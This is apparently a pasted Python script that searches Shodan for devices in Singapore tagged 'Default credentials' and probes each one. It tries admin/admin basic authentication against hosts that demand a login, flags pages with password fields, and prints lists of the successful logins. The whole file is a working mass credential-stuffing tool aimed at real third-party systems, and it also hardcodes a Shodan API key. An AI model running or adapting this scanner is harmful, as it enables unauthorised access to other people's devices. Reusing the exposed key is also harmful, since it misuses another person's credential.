import shodanimport requestsfrom bs4 import BeautifulSoupSHODAN_API_KEY

1. import shodan
2. import requests
3. from bs4 import BeautifulSoup
4.  
5. SHODAN_API_KEY = "2Y5R9scM5dnNIlcNzUQQdzzn14UOwdSF"
6.  
7. api = shodan.Shodan(SHODAN_API_KEY)
8.  
9.  
10. basicAuthenticatedIps = [];
11. passwordFieldIps = [];
12. basicAuthenticatedSuccessfulIps = [];
13.  
14. def tryBasicAuthentication(ip):
15.  
16.     basicAuthenticatedIps.append(ip);
17.  
18.     username = 'admin';
19.     password = 'admin';
20.  
21.     authenticatedRequest = requests.get(ip, auth=(username, password), verify=False)
22.     if authenticatedRequest.status_code == 200:
23.         print ('Status - Login Successful')
24.         basicAuthenticatedSuccessfulIps.append(ip);
25.     else:
26.         print ('Status - Basic Authentication Failed')
27.  
28.  
29. def parseHtml(html_doc):
30.  
31.     soup = BeautifulSoup(html_doc, 'html.parser')
32.     html_doc_body = soup.body
33.  
34.     if html_doc_body == None:
35.         return False
36.  
37.     '''
38.     usernameBoxNames = ['username', 'email']   
39.     for usernameBoxName in usernameBoxNames:
40.         usernameInputBox = html_doc_body.find('input', attrs={'name':usernameBoxName})
41.         passwordInputBox = html_doc_body.find('input', attrs={'type':'password'})
42.         submitButton = html_doc_body.find('input', attrs={'type':'submit'})
43.  
44.         if usernameInputBox != None and passwordInputBox != None and submitButton != None:
45.             print('Username field is ' + usernameBoxName)
46.             return True
47.     '''
48.  
49.     # if the page has passowrd field, then there is chance to authenticate
50.     passwordInputBox = html_doc_body.find('input', attrs={'type':'password'})
51.  
52.     if passwordInputBox != None:
53.         return True
54.  
55.     return False
56.  
57.  
58.  
59. try:
60.     results = api.search ('"Default credentials" country:SG')
61.     print('Results found: %s' % results['total'])
62.     for result in results['matches']:
63.         info = api.host(result['ip_str'])
64.         if info != 'Error: Invalid IP':
65.             ip = 'http://' + result['ip_str'] + '/'
66.             try:
67.                 print('Trying to access IP : ' + ip)
68.                 r = requests.get(ip, verify=False, timeout=5)
69.                 if r.status_code == 200:
70.                     print("Parsing html for the page")
71.                     existPasswordField = parseHtml(r.text)
72.                     if existPasswordField :
73.                         passwordFieldIps.append(ip);
74.                 elif r.status_code == 401:
75.                     print("Trying Basic authentication")
76.                     tryBasicAuthentication(ip)
77.                     basicAuthenticatedIps.append(ip)
78.  
79.             except requests.exceptions.ConnectionError:
80.                 pass
81.                    
82. except shodan.APIError:
83.     print ('Error')
84.  
85. print("");
86. print("===========================================")
87. print("List of Ips that was basic authenticated: ")
88. print(basicAuthenticatedIps);
89.  
90. print("");
91. print("===========================================")
92. print("List of Ips with successful basic authentication: ")
93. print(basicAuthenticatedSuccessfulIps);
94.  
95. print("")
96. print("===========================================")
97. print("List of Ips that has password field")
98. print(passwordFieldIps)